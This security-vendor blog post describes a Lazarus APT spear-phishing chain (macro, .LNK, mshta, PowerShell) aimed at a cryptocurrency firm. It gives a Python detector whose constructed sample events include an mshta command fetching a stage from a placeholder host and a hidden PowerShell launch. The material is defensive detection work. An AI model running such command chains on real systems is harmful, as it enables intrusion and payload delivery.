The Lazarus APT group is one of the few state-sponsored cyber espionage units that also handles financially motivated cybercrime, and it is the most profitable threat actor in the cryptocurrency scene, having stolen about $2 billion. In 2017 alone, the group stole more than half a billion dollars in cryptocurrency, so its interest in traders and exchanges is not weakening, and it recently launched another attack on a cryptocurrency organization.

This time, Lazarus APT took advantage of an already proven trick and carried out a spear-phishing campaign using a fake LinkedIn job advert aimed at a system administrator at the targeted cryptocurrency organization. The victim received a malicious document with a macro that creates a .LNK file, which in turn calls out to a link by executing mshta.exe. The script then sends operational information to a C&C server and receives a PowerShell script that can fetch the payloads used by Lazarus APT in this campaign.
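The chain above (Office document, then mshta.exe reaching out to a URL, then PowerShell) leaves a recognisable parent/child pattern in process-creation telemetry. The detector below is an added example written for this post, not the SOC Prime rule or any Lazarus tooling; it runs over constructed Sysmon-style events (the paths, the placeholder URL and the command lines are all made up) and flags the three links of that chain.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\admin\Downloads\Job_Description.docm"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"mshta.exe http://placeholder.invalid/stage1"},   # placeholder URL
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\admin\AppData\Local\Temp\update.hta"},  # local, benign-looking
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"powershell.exe -w hidden -c Get-Process"},
]

# Office binaries that should not normally launch scripting hosts.
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path, e.g. 'mshta.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return the names of the detection rules a single process-creation event matches."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "mshta.exe" and parent in OFFICE_APPS:
        hits.append("office_spawns_mshta")          # macro/.LNK stage launching mshta
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_url")             # mshta pulling content from a URL
    if image == "powershell.exe" and parent == "mshta.exe":
        hits.append("mshta_spawns_powershell")      # second-stage PowerShell from mshta
    return hits


def scan(events):
    """Map event index -> matched rule names for every event with at least one hit."""
    results = {}
    for i, event in enumerate(events):
        hits = detect(event)
        if hits:
            results[i] = hits
    return results
```

Event 2 (mshta.exe launched from explorer.exe with a local .hta) deliberately produces no hit, so the rules key on the parent and the remote URL rather than on mshta.exe alone.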

Emir Erdogan developed the exclusive rule that enables detection of the TTPs leveraged by Lazarus Group during this attack:

The rule has translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio

EDR: Carbon Black, Elastic Endpoint

Tactics: Execution, Defense Evasion

Techniques: Command-Line Interface (T1059), Indicator Removal on Host (T1070), Modify Registry (T1112)

Ready to try out SOC Prime TDM? Sign up for free. Or join Threat Bounty Program to craft your own content and share it with the TDM community.
